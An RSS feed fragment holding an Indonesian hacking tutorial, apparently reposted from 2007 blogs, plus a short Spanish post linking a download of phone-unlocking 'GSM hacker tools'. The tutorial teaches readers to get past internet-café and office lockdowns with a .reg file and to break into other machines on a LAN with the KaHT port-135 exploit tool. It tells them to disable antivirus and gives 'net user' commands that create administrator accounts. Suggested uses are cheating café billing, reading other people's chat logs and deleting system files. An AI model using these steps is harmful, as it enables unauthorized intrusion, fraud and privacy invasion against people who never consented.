<p>Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.</p>
<p>1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ -&#62;&#62; ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.</p>
<p>2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :</p>
<p>1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties</p>
<p>2. Di properties pilihlah "find target…"</p>
<p>3. Muncul Window lalu pilih search diatas</p>
<p>4. Pada Search pilihlah "All Files and folders"</p>
<p>5. Lalu cari file "cmd.exe" di windows</p>
<p>6. Jika di temukan maka jalankan file cmd.exe.<br />
*<br />
7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.</p>
<p>3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini</p>
<p>1. Masuk ke Notepad / Wordpad / Ms Word</p>
<p>2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""Explorer] "NoRun"=dword:00000000</p>
<p>3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.</p>
<p>4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.</p>
<p>1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\""KaH) maka ketikkan "CD\""KaHT" dan seterusnya. Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\""windows\""system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\""Program Files\""MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat "/logs" maksudnya kalau tadi di C:\""program Files\""MiRC program MiRCnya maka cukup masuk aja di C:\""Program Files\""MiRC\""Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri :</p>
<p>1. Ketik : net user /add</p>
<p>2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer</p>
<p>http://dl.winsite.com/files/439/ar2/win95/netutil/maniac.zip<br />
http://evalsoftware.atelierweb.com/awrc62.zip</p>
<p>source:<br />
http://har3165.blogsome.com/2007/05/23/cara-masuk-di-komputer-lain-lewat-dos-windows-xp-2000/<br />
http://frengkysilaban.blogs.ie/2007/05/23/tips-01/</p>
<p>Thank's</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Gsm HackTools]]></title>
<link>http://davidjunco.wordpress.com/?p=32</link>
<pubDate>Sat, 05 Jul 2008 02:15:28 +0000</pubDate>
<dc:creator>davidjunco</dc:creator>
<guid>http://davidjunco.wordpress.com/?p=32</guid>
<description><![CDATA[
Hola amigos, hace tiempo encontre este compendio de herramientas para debloquear telefono celulares]]></description>
<content:encoded><![CDATA[<p style="text-align:center;"><img class="aligncenter" src="http://bp0.blogger.com/_GCv9QRxIPCw/R58iVskFTFI/AAAAAAAAA9I/ib0IpkIgmYE/s400/47889_s__babojebac_1.jpg" alt="Hack" /></p>
<p>Hola amigos, hace tiempo encontre este compendio de herramientas para debloquear telefono celulares, tal vez lo baje del espacio del sr. portillo que trabaja en la universidad en la que estudie, no recuerdo, pero por si no kieren pagar unos 50 o 100 pesos, aki les dejoestos, son bastantes, espero les sirva, aclar q no los he usado todos, puesto que no hay demanda.</p>
<p>Enjoy</p>
<p>By Juncker</p>
<p><a title="Rapidshare" href="http://rapidshare.com/files/118459613/GSM_Hacker_Tools.rar" target="_self">Rapidshare</a></p>
]]></content:encoded>
</item>

</channel>
</rss>
